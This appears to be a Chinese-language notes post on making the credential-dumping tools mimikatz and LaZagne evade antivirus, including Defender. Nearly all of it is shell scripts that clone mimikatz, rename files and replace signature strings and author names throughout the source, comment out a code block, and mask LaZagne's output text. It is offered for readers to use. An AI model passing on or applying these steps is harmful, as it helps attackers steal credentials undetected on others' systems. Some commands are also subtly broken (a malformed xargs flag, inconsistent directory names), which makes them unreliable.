关于mimikatz lazagne免杀方法

其实现在的杀软还是玩的老一套，改改特征字符就能过了，最新的defender能用这个方法过

文章直接从笔记复制出来的，有需要的自己看情况用

git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg
find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
        mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
        mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -print0 | xargs - sed -i 's/mimikatz/windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/MIMIKATZ/WINDOWS/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Mimikatz/Windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DELPY/gweep/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Benjamin/gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/creativecommons/notcommons/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/gentilkiwi/MSOffice/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/KIWI/ONEDRIVE/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Kiwi/Onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/kiwi/onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DumpCreds/DumpCred/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/logonPasswords/logonPassword/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/ArgumentPtr/NotTodayPal/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 

cd ./lmmg/lmmg/
sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c
sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c

lazagne
find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
        mv "${FILE}" "${newfile}";
done
find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
        mv "${FILE}" "${newfile}";
done

find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
        newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
        mv "${FILE}" "${newfile}";
done

find windows/ -type f -print0 | xargs - sed -i 's/lazagne/kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/LaZagne/Kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/laZagne/KMm/g'

find windows/ -type f -print0 | xargs - sed -i 's/BANG/bg/g'
find windows/ -type f -print0 | xargs - sed -i 's/passwords ---------------/vp/g'
find windows/ -type f -print0 | xargs - sed -i 's/Password not found/nop/g'
find windows/ -type f -print0 | xargs - sed -i 's/=================================================================/ll/g'
find windows/ -type f -print0 | xargs - sed -i 's/########## User/lp/g'
find windows/ -type f -print0 | xargs - sed -i 's/For more information launch it again with the -v option/jj/g'